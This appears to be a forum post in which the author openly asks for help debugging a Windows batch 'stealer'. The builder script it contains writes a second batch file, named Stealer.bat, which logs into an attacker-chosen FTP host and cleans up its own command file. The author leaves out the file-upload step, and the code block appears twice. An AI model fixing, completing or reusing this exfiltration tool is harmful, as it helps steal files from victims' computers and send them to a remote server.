So, i'm making a batch stealer, and i'm making it connect the fto. The thing is: The password line is fucking up. If i reopen the server that i makes, and rewrite the password line it will work. Can anyone help me?
set /p host=FTP Host to connect:
set /p usrnm=FTP Username:
set /p paswrd=FTP Password:
echo echo user %usrnm%^> ftpcmd.dat > online.bat
echo echo %paswrd%^>^> ftpcmd.dat >> online.bat
echo echo cd public_html^>^> ftpcmd.dat >> online.bat
Here is the part that send files that i deleted because its useless for help.
echo echo disconnect^>^> ftpcmd.dat >> online.bat
echo echo bye^>^> ftpcmd.dat >> online.bat
echo ftp -v -n -i -s:ftpcmd.dat %host% >> online.bat
echo del ftpcmd.dat >> online.bat
copy onlin*.bat Stealer.bat
del onli*
set /p host=FTP Host to connect:
set /p usrnm=FTP Username:
set /p paswrd=FTP Password:
echo echo user %usrnm%^> ftpcmd.dat > online.bat
echo echo %paswrd%^>^> ftpcmd.dat >> online.bat
echo echo cd public_html^>^> ftpcmd.dat >> online.bat
Here is the part that send files that i deleted because its useless for help.
echo echo disconnect^>^> ftpcmd.dat >> online.bat
echo echo bye^>^> ftpcmd.dat >> online.bat
echo ftp -v -n -i -s:ftpcmd.dat %host% >> online.bat
echo del ftpcmd.dat >> online.bat
copy onlin*.bat Stealer.bat
del onli*